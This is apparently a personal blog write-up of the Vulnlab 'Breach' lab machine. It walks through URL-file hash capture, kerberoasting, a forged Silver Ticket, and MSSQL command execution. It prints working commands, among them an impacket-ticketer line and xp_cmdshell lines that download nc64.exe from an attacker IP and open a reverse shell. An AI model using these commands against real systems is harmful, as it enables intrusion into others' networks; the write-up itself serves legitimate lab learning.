Persecure : my learning archive

Breach

Breach, an Active Directory machine created by xct in vulnlab, employs NTLM hash capture for initial access and utilizes a Silver Ticket attack to gain entry into the network.

Enumeration

Start a nmap scan to look for open ports and add the necessary flags for in depth enumeration.

From the scan we can take note of the domain name (baby.vl) and start the process of null enumeration.

Initial Foothold

With SMB null enumeration we are able to view some folders.

Further enumerating the share folder, we found a couple of potential users.

Let’s input a .URL file and see if there is a potential URL file attack.

Immediately we are able to collect a hash.

Once we are done with are usual enumerations of newly gained creds, the user is unable to gain any kind of access into the machine.

However, we are able to use the user to kerberoast and get a service account.

This user has no access to the machine either but from the nmap scan we can see that the mssql server is open.

However, the user has guest limitations.

From the clue in the box descriptions, it seems that we are to use a silver ticket attack.

A Silver Ticket Attack is when an attacker forges authentication tickets in Microsoft’s Active Directory system, allowing them unauthorized access to network resources without legitimate credentials. It’s a type of cyber-attack exploiting weaknesses in the Kerberos authentication protocol.

In order to perform a silver ticket attack we require the following:

  • Domain SID
  • User NTLM hash
  • User SPN

We can get the Domain SID from impacket’s lookupsid:

impacket-lookupsid breach.vl/svc_mssql:'Trustno1'@10.10.78.61

We can just convert the plaintext password to NTLM on any browser-based tool.

And lastly, for the SPN we can retrieve it from the kerberoast attack.

To create the silver ticket we need to use impacket-ticketer. Remember to choose Administrator as the user.

impacket-ticketer -nthash '69596C7AA1E8DAEE17F8E78870E25A5C' -domain-sid 'S-1-5-21-2330692793-3312915120-706255856' -domain breach.vl -spn 'MSSQLSvc/breach.vl:1433' -user-id 500 Administrator

Export the ticket. 

export KRB5CCNAME=Administrator.ccache

We can use the ticket to gain access to the mssql server..

In the mssql since we are the administrator we can use xp_cmdshell to execute commands.

After some trial and error, I’m able to get the nc64.exe binary in the machine. Most of the revershell scripts had been blocked by defender. 

xp_cmdshell powershell -c "wget -usebasicparsing http://10.8.1.176:8888/nc64.exe -o C:\Temp\nc64.exe"

Execute the command to connect to netcat.

xp_cmdshell powershell -c "C:\Temp\nc64.exe -e cmd 10.8.1.176 443"

And we get a shell.

Privilege Escalation

The svc_mssql user has SeImpersonatePrivilege and we can use juicy potato to escalate privileges.

Create a website or blog at WordPress.com